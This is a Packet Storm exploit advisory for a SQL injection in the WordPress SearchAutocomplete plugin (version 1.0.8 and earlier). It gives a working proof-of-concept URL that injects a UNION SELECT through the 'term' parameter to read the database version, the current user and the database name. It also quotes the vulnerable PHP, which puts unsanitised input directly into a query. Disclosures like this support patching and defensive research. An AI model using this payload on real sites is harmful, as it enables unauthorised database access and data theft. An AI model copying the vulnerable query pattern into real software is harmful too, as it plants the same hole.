Lucene search

K
packetstormMiroslav StamparPACKETSTORM:104722
HistorySep 02, 2011 - 12:00 a.m.

WordPress SearchAutocomplete 1.0.8 SQL Injection

2011-09-0200:00:00
Miroslav Stampar
packetstormsecurity.com
27
`# Exploit Title: WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability  
# Date: 2011-09-01  
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  
# Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip  
# Version: 1.0.8 (tested)  
# Note: magic_quotes has to be turned off  
  
---  
PoC  
---  
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20  
  
---------------  
Vulnerable code  
---------------  
if ($_GET['term'] != '') {  
...  
$titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");  
  
  
  
  
  
`